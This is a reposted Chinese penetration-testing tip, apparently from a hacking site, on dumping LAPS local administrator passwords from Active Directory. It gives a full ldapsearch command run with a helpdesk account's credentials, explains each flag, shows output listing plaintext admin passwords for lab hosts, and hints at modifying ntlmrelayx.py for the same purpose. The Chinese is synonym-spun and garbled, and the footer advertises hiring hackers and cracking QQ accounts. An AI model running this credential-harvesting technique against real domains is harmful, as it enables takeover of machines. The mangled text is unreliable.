域浸透TIPS:获取LAPS管理员暗码

访客5年前黑客文章1032


假如你之前有对启用LAPS机制的主机进行浸透测验,那么你应该能体会到该机制的随机化本地管理员暗码是有多么令人苦楚。
LAPS将其信息存储在活动目录:
存储暗码过期时刻:ms-Mcs-AdmPwdExpirationTime: 131461867015760024
以明文显现的存储暗码:ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(
LAPS前期版别中,任何用户都能够读取活动目录中的内容。还好微软现已修正,现在你有必要取得该目标的一切扩展权限或者是彻底操控权限才能够进行拜访。

在杂乱的实在环境中,内网主机中还或许存在躲藏的OU权限管理员,乃至是具有彻底操控权限的,担任特定用户组的一个规范用户。
得益于Meatballs开发的Metasploit模块:https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/enum_laps.rb 协助咱们完成了这项作业。可是咱们不或许每次都特别翻开一个Meterpreter会话来运转该模块吧?
运用ldapsearch(包括在Debian/Ubuntu的ldapscripts程序包中)能够被用来结构与该模块相同的恳求,以下就是一个比如:
ldapsearch -x -h 192.168.80.10 -D
"helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info"
"(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
解析:
-x – 运用根底身份验证
-h 192.168.80.10 – 将ldap衔接到域操控器
-D “helpdesk” -w ASDqwe123 – 以用户名helpdesk,暗码ASDqwe123进行登录
-b “dc=sittingduck,dc=info” – 加载整个域的根底LDAP目标
“(ms-MCS-AdmPwd=*)” – 过滤掉一切不能检查的ms-MCS-AdmPwd值 (只需具有满足的权限,乃至还能够获取Administrator暗码)
ms-MCS-AdmPwd – 仅显现ms-MCS-AdmPwd目标 (默许包括目标名以及DN,所以你仍是能知道主机从属关系)
运转状况如下:
$ ldapsearch -x -h 192.168.80.10 -D "helpdesk" -w ASDqwe123 -b "dc=sittingduck,dc=info" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd
# extended LDIF
#
# LDAPv3
# base  with scope subtree
# filter: (ms-MCS-AdmPwd=*)
# requesting: ms-MCS-AdmPwd
#
# DC1, Domain Controllers, sittingduck.info
dn: CN=DC1,OU=Domain Controllers,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 2F1i/++N0H+G]{Y&,F
# SDCLIENT_DAWIN7, LabComputers, Lab, sittingduck.info
dn: CN=SDCLIENT_DAWIN7,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: 8CDR4,2UE8BA{zw2@RR
# SD_WSUS_2012, LabComputers, Lab, sittingduck.info
dn: CN=SD_WSUS_2012,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: +3!UY5@g9B.64RV2z/T
# WIN-PM0ID6F0AHN, LabComputers, Lab, sittingduck.info
dn: CN=WIN-PM0ID6F0AHN,OU=LabComputers,OU=Lab,DC=sittingduck,DC=info
ms-Mcs-AdmPwd: %v!e#7S#{s})+y2yS#(
# search reference
ref: ldap://research.sittingduck.info/DC=research,DC=sittingduck,DC=info
# search reference
ref: ldap://ForestDnsZones.sittingduck.info/DC=ForestDnsZones,DC=sittingduck,D
 C=info
# search reference
ref: ldap://DomainDnsZones.sittingduck.info/DC=DomainDnsZones,DC=sittingduck,D
 C=info
# search reference
ref: ldap://sittingduck.info/CN=Configuration,DC=sittingduck,DC=info
# search result
search: 2
result: 0 Success
至从取得本地管理员暗码,但还没有确认该帐号是否启用,你能够运用Kerberos进行身份验证。因为Windows中域操控器对LDAP衔接不会要求证书验证(据我所知),你只需在ntlmrelayx.py进行一些小修正就能转储LAPS暗码了;-)
 

相关文章

Mr.Robot靶机实战演练

前语 靶机主题来自美剧《黑客军团》,这是一部传达极客精力和黑客文明的上佳著作,不同于《硅谷》的搞笑风格,这部剧的主角Eliot患有精力分裂,整部剧的情节都较为压抑,有点类似于电影《搏击沙龙》中双重人格...

破解qq空间,网赌能找黑客追回来么,高价找手机棋牌黑客

$handle = fopen($filename, "r");绑架自己开发的.Net程序Status: clientTransferProhibitedhttp://www.icann.org/ep...

男方坐牢回来继续赌博想起诉离婚男方要付刑事责任吗

不过目前为止,还未发现任何恶意行为利用这个漏洞,GitHub上出现不少利用这个消息骗Star、钓鱼或者进行恶作剧的。 Windows Server 2008男方坐牢回来继续赌博想起诉离婚男方要付刑事责...

weblogic控制台布置web使用

怎么运用weblogic办理控制台布置和卸载一个WEB使用呢?下面咱们来分步演示! 东西/质料 Oracle WebLogic WEB使用War包 办法/过程 1 用IE浏览器,翻开办理控制台,输入办...

Nmap备忘单:从探究到缝隙使用(Part 2)

TCP SYN扫描 SYN扫描是默许的且最盛行的扫描选项是有必定原因的。它能够在不受防火墙约束的高速网络每秒扫描数千个端口 。一起也是相对不显眼的和荫蔽的,由于它永久不会完结TCP衔接。 指令:NMA...

黑客团队接单网,自学黑客从哪找资源,出钱找黑客办事

一个FTP,两个3389,一个Mysql。 抛开其他不谈,这次只看FTP。 好了,现在开端咱们的无人机绑架之旅。 paperLevel 4 → Level 5101 Options :所以咱们...